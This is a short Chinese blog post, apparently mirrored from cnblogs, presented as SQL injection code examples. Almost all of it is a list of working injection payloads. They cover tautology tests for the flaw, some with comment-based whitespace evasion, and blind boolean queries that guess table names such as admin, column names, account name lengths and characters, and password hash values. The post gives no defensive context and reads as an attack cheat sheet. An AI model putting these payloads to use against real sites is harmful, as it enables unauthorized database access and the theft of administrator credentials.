zoukankan      html  css  js  c++  java
  • 黄聪:SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码

    检查漏洞

    1' or 1=1  or ('1' = '1
    1' or 1=1)  or '1' = '1
    1' or 1=1 or '1' = '1
    1'/**/or/**/1=1/**/or/**/'1'= '1

    猜表名
    1' or 0<(select count(*) from admin) and '1' = '1
    1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
    1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1


    猜列名
    1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
    1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
    1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1

    猜帐号
    1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1)  and '1' = '1
    1' or 1<(select top 1 count(*) from admin where name = 'XXX' )  and '1' = '1

    猜帐号
    1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635   and '1' = '1
    1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
    1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
    1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a')  and '1' = '1
    1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
    1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
    1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1

  • 相关阅读:
    Java高并发秒时啊API之Service层
    Junit测试类生成
    Java高并发秒时啊API之业务分析与Dao层2
    Java高并发秒时啊API之业务分析与Dao层1
    JSP知识_EL表达式
    Maven_3_webAPP
    Maven_2_核心知识
    添加bean的监听
    异步上传文件
    ACTIVITI工作流的集成记录
  • 原文地址:https://www.cnblogs.com/huangcong/p/2108073.html
Copyright © 2011-2022 走看看